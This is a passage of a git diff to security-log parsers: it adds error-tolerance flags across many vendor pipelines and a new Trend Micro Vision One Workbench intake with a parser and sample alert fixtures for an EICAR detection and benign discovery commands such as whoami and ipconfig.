diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json index 25db7ff0a..c0622d09c 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json @@ -25,6 +25,7 @@ "type": "globalprotect" }, "host": { + "id": "e4f14dfd-bd3c-40e5-9c4e", "name": "LNL-test" }, "log": { diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json index dee27d0e1..48cbcdca5 100644 --- a/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json +++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json @@ -44,7 +44,7 @@ "1.2.3.4" ], "user": [ - "JDOE" + "test.fr" ] }, "source": { @@ -53,8 +53,8 @@ "port": 0 }, "user": { - "domain": "test.fr", - "name": "JDOE" + "domain": "JDOE", + "name": "test.fr" } } } \ No newline at end of file diff --git a/RSA/rsa-securid/ingest/parser.yml b/RSA/rsa-securid/ingest/parser.yml index c70fee596..451c6f163 100644 --- a/RSA/rsa-securid/ingest/parser.yml +++ b/RSA/rsa-securid/ingest/parser.yml @@ -4,6 +4,7 @@ pipeline: external: name: dsv.parse-dsv properties: + raise_errors: false input_field: original.message output_field: message columnnames: diff --git a/Retarus/retarus_email_security/ingest/parser.yml b/Retarus/retarus_email_security/ingest/parser.yml index 6bd68803a..f55fa8ea7 100644 --- a/Retarus/retarus_email_security/ingest/parser.yml +++ b/Retarus/retarus_email_security/ingest/parser.yml @@ -7,6 +7,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: json_event.message.sender output_field: sender pattern: "^%{GREEDYDATA:username}@%{GREEDYDATA:domain}$" 
@@ -15,6 +16,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: json_event.message.recipient output_field: recipient pattern: "^%{GREEDYDATA:username}@%{GREEDYDATA:domain}$" diff --git a/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml b/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml index 9fc2ec259..20b07e5f4 100644 --- a/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml +++ b/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml @@ -28,6 +28,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parse_kv.message.http_request_first_line}}" output_field: message pattern: "%{WORD:http_method} %{URL:url} HTTP/%{NUMBER:http_version}" diff --git a/SonicWall/sonicwall-fw/ingest/parser.yml b/SonicWall/sonicwall-fw/ingest/parser.yml index 8a913cd4e..03aa0ed21 100644 --- a/SonicWall/sonicwall-fw/ingest/parser.yml +++ b/SonicWall/sonicwall-fw/ingest/parser.yml @@ -35,6 +35,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.susr}}" output_field: result pattern: "(%{USER_WITH_DOMAIN}|%{GREEDYDATA:user_name})" @@ -47,6 +48,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.msg}}" output_field: result pattern: "(%{GREEDYDATA}[F|f]ilename: %{FILE:filename}%{GREEDYDATA})" diff --git a/Sophos/sophos edr/ingest/parser.yml b/Sophos/sophos edr/ingest/parser.yml index f7dc22739..c4779fa3f 100644 --- a/Sophos/sophos edr/ingest/parser.yml +++ b/Sophos/sophos edr/ingest/parser.yml @@ -9,6 +9,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: 'Access was blocked to "%{URL:url}" because of "%{WORD:rulename}".' 
@@ -19,6 +20,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "Controlled application %{WORD}: %{GREEDYDATA:process_title}" @@ -27,6 +29,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "%{REMOVABLE_STORAGE}|%{STORAGE}" @@ -38,6 +41,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "PUA %{GREEDYDATA:action}: '%{GREEDYDATA:threat}' at '%{GREEDYDATA:file_path}'" @@ -46,6 +50,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "'%{GREEDYDATA:threat}' exploit prevented in %{GREEDYDATA:category}" diff --git a/Squid/squid/ingest/parser.yml b/Squid/squid/ingest/parser.yml index f5b9de6f9..14c43d5d1 100644 --- a/Squid/squid/ingest/parser.yml +++ b/Squid/squid/ingest/parser.yml @@ -48,6 +48,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.url output_field: message pattern: "(%{IP:ip}|%{NOTSPACE:domain}):%{NUMBER:port}" diff --git a/Systancia/cleanroom/ingest/parser.yml b/Systancia/cleanroom/ingest/parser.yml index 0b80ff87c..44342010b 100644 --- a/Systancia/cleanroom/ingest/parser.yml +++ b/Systancia/cleanroom/ingest/parser.yml @@ -16,6 +16,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{event.result.event_reason}}" output_field: result pattern: "%{SESSION_SUCCESS}|%{SESSION_FAILURE}|%{PROCESS}" diff --git a/Tehtris/tehtris-edr/ingest/parser.yml b/Tehtris/tehtris-edr/ingest/parser.yml index cbcb244bb..aa8f22411 100644 --- a/Tehtris/tehtris-edr/ingest/parser.yml +++ b/Tehtris/tehtris-edr/ingest/parser.yml 
@@ -23,6 +23,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.description}}" pattern: "(%{APPLICATION_POLICY}|%{URL_DETECTED}|%{MALICIOUS_MACRO})" custom_patterns: diff --git a/ThinkstCanary/thinkst-canary/ingest/parser.yml b/ThinkstCanary/thinkst-canary/ingest/parser.yml index f8cada9ff..8ce315396 100644 --- a/ThinkstCanary/thinkst-canary/ingest/parser.yml +++ b/ThinkstCanary/thinkst-canary/ingest/parser.yml @@ -21,6 +21,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{parsed_event.message.DN}}" output_field: result value_sep: "=" diff --git a/Trend Micro/trend-micro-vision-one-workbench/CHANGELOG.md b/Trend Micro/trend-micro-vision-one-workbench/CHANGELOG.md new file mode 100644 index 000000000..11bddf32c --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/CHANGELOG.md @@ -0,0 +1,8 @@ +# Changelog + +All notable changes to this project will be documented in this file. + +The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), +and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). + +## [Unreleased] diff --git a/Trend Micro/trend-micro-vision-one-workbench/_meta/fields.yml b/Trend Micro/trend-micro-vision-one-workbench/_meta/fields.yml new file mode 100644 index 000000000..2f93f2919 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/_meta/fields.yml 
@@ -0,0 +1,39 @@ +action.properties.ScriptBlockText: + description: '' + name: action.properties.ScriptBlockText + type: keyword + +trendmicro.vision_one.alert_id: + description: '' + name: trendmicro.vision_one.alert_id + type: keyword + +trendmicro.vision_one.case_id: + description: '' + name: trendmicro.vision_one.case_id + type: keyword + +trendmicro.vision_one.detection_name: + description: '' + name: trendmicro.vision_one.detection_name + type: keyword + +trendmicro.vision_one.incident_id: + description: '' + name: trendmicro.vision_one.incident_id + type: keyword + +trendmicro.vision_one.investigation_status: + description: '' + name: trendmicro.vision_one.investigation_status + type: keyword + +trendmicro.vision_one.severity: + description: '' + name: trendmicro.vision_one.severity + type: keyword + +trendmicro.vision_one.status: + description: '' + name: trendmicro.vision_one.status + type: keyword diff --git a/Trend Micro/trend-micro-vision-one-workbench/_meta/logo.png b/Trend Micro/trend-micro-vision-one-workbench/_meta/logo.png new file mode 100644 index 000000000..e51bb3eb7 Binary files /dev/null and b/Trend Micro/trend-micro-vision-one-workbench/_meta/logo.png differ diff --git a/Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml new file mode 100644 index 000000000..014352012 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml 
@@ -0,0 +1,12 @@ +uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e +automation_connector_uuid: 7aa5dd7c-d694-44dd-b605-66b7974dfb05 +automation_module_uuid: 1b02d442-b804-4987-afe7-6a4be6ef35e6 +name: Trend Micro Vision One Workbench Alerts [BETA] +slug: trend-micro-vision-one-workbench-alerts + +description: >- + Trend Micro Vision One is an extended detection and response (XDR) platform that enhances threat detection, investigation, and response across multiple security layers. It provides a centralized view for improved security posture and faster threat remediation. + This intake format will ingest Workbench Alerts from Trend Micro Vision One. + +data_sources: + Process monitoring: diff --git a/Trend Micro/trend-micro-vision-one-workbench/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one-workbench/_meta/smart-descriptions.json new file mode 100644 index 000000000..742eee7cc --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/_meta/smart-descriptions.json @@ -0,0 +1,10 @@ +[ + { + "value": "{event.reason} on {host.ip}", + "conditions": [{ "field": "event.reason" }, { "field": "host.ip" }] + }, + { + "value": "{event.reason}", + "conditions": [{ "field": "event.reason" }] + } +] diff --git a/Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml b/Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml new file mode 100644 index 000000000..f5859582b --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml 
@@ -0,0 +1,102 @@ +name: trend-micro-vision-one-workbench +ignored_values: [] +pipeline: + - name: parsed_event + external: + name: json.parse-json + properties: + input_field: "{{original.message}}" + output_field: message + + - name: set_ecs_fields + +stages: + set_ecs_fields: + actions: + - set: + event.kind: alert + event.category: ["intrusion_detection"] + event.type: ["info"] + observer.vendor: "TrendMicro" + observer.product: "Vision One" + + event.reason: "{{parsed_event.message.model}}" + + - set: + "@timestamp": "{{parsed_event.message.createdDateTime}}" + + host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.name }}" + host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.ips }}" + host.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.guid }}" + + user.email: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'emailAddress') | first).entityValue }}" + container.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'container') | first).entityValue }}" + container.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'container') | first).entityId }}" + + rule.name: "{{parsed_event.message.model}}" + rule.id: "{{parsed_event.message.model.modelId}}" + + event.url: "{{parsed_event.message.workbenchLink}}" + event.action: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'actResult') | first).value }}" + + - set: + user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'account') | first).entityValue }}" + + - set: + user.name: "{{final.user.id.split('\\\\') | last}}" + user.domain: "{{final.user.id.split('\\\\') | first}}" + filter: "{{final.user.id != null}}" + + - set: + process.command_line: "{{ 
(parsed_event.message.indicators | selectattr('field', '==', 'processCmd') | first).value }}" + process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentCmd') | first).value }}" + process.executable: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFilePath') | first).value }}" + process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFilePath') | first).value }}" + process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFileHashSha1') | first).value }}" + process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFileHashSha256') | first).value }}" + + process.parent.pid: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentPid') | first).value }}" + process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'in', ['processPid', 'objectPid']) | first).value }}" + + process.parent.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFileHashSha1') | first).value }}" + process.parent.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFileHashSha256') | first).value }}" + + - set: + registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_key') | first).value.split('\\\\')[0] }}" + registry.key: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}" + registry.value: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_value') | first).value }}" + registry.path: > + {%- set path = [] -%} + {%- for indicator in parsed_event.message.indicators -%} + {%- if indicator.type == 'registry_key' -%}{%- set path = path.append(indicator.value) -%}{% endif %} + {%- endfor -%} + {%- for indicator in parsed_event.message.indicators -%} + {%- if indicator.type == 'registry_value' 
-%}{%- set path = path.append(indicator.value) -%}{% endif %} + {%- endfor -%} + {%- if path | length > 0 -%}{{ path | join('\\') }}{%- endif -%} + + registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_value_data') | first).value }}" + + - set: + registry.data.type: "REG_SZ" + filter: "{{final.registry.data.strings != null }}" + + - set: + file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'file_sha1') | selectattr('field', 'in', ['fileHash', 'objectFileHashSha1']) | first).value }}" + file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'objectFileHashSha256') | first).value }}" + file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'in', ['objectFilePath', 'fullPath']) | first).value }}" + file.name: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'fileName') | first).value }}" + + user.name: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'logonUser') | first).value }}" + + - set: + action.properties.ScriptBlockText: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'objectRawDataStr') | first).value }}" + + - set: + trendmicro.vision_one.severity: "{{parsed_event.message.severity}}" + trendmicro.vision_one.incident_id: "{{parsed_event.message.incidentId}}" + trendmicro.vision_one.case_id: "{{parsed_event.message.caseId}}" + trendmicro.vision_one.alert_id: "{{parsed_event.message.id}}" + trendmicro.vision_one.status: "{{parsed_event.message.status}}" + trendmicro.vision_one.investigation_status: "{{parsed_event.message.investigationStatus}}" + trendmicro.vision_one.detection_name: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'detection_name') | first).value }}" 
diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_eicar_test_file_detection.json new file mode 100644 index 000000000..53813871b --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_eicar_test_file_detection.json 
@@ -0,0 +1,59 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": 
\"file_sha1\", \"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, 
\"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"file_sha1\", \"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": 
[\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "action": "File quarantined", + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Eicar Test File Detection", + "type": [ + "info" + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000" + }, + "@timestamp": "2024-11-26T16:51:29Z", + "file": { + "hash": { + "sha1": "667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8" + }, + "name": "eicar-com.txt", + "path": "C:\\Users\\jdoe\\Downloads\\eicar-com.txt" + }, + "host": { + "id": "ecede9e8-407e-4f34-9747-4a145c247ad5", + "ip": [ + "10.0.0.6" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "related": { + "hash": [ + "667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8" + ], + "ip": [ + "10.0.0.6" + ] + }, + "rule": { + "name": "Eicar Test File Detection" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "detection_name": "Eicar_test_1", + "investigation_status": "New", + "severity": "low", + "status": "Open" + } + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_information_gathering.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_information_gathering.json new file mode 100644 index 000000000..edbe26be4 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_information_gathering.json 
@@ -0,0 +1,77 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"b4e0f834-178b-4a3d-a5ef-d44c603d1a48\", \"model\": \"Potential Information Gathering\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:48:06Z\", \"updatedDateTime\": \"2024-11-26T16:48:06Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"7f56b5b6-4fba-42b1-a1c8-d4fa64300f4a\"}]}, \"description\": \"A process has executed multiple discovery tools.\", \"matchedRules\": [{\"id\": \"1be9b378-eb8a-4736-92ba-55c184b2ca55\", \"name\": \"Potential Information Gathering\", \"matchedFilters\": [{\"id\": \"7062d4bd-33ca-4634-8f04-a7e4e8698548\", \"name\": \"WhoAmI Execution\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"mitreTechniqueIds\": [\"T1033\"], \"matchedEvents\": [{\"uuid\": \"54955525-b5ac-4b31-b5b7-0e03ba25aa4a\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"type\": 
\"TELEMETRY_PROCESS\"}]}, {\"id\": \"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\", \"name\": \"IPconfig Execution\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"mitreTechniqueIds\": [\"T1016\"], \"matchedEvents\": [{\"uuid\": \"7a733f00-faa0-4ac2-b97c-34d8f3ffd230\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\whoami.exe\\\"\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\ipconfig.exe\\\" /all \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": 
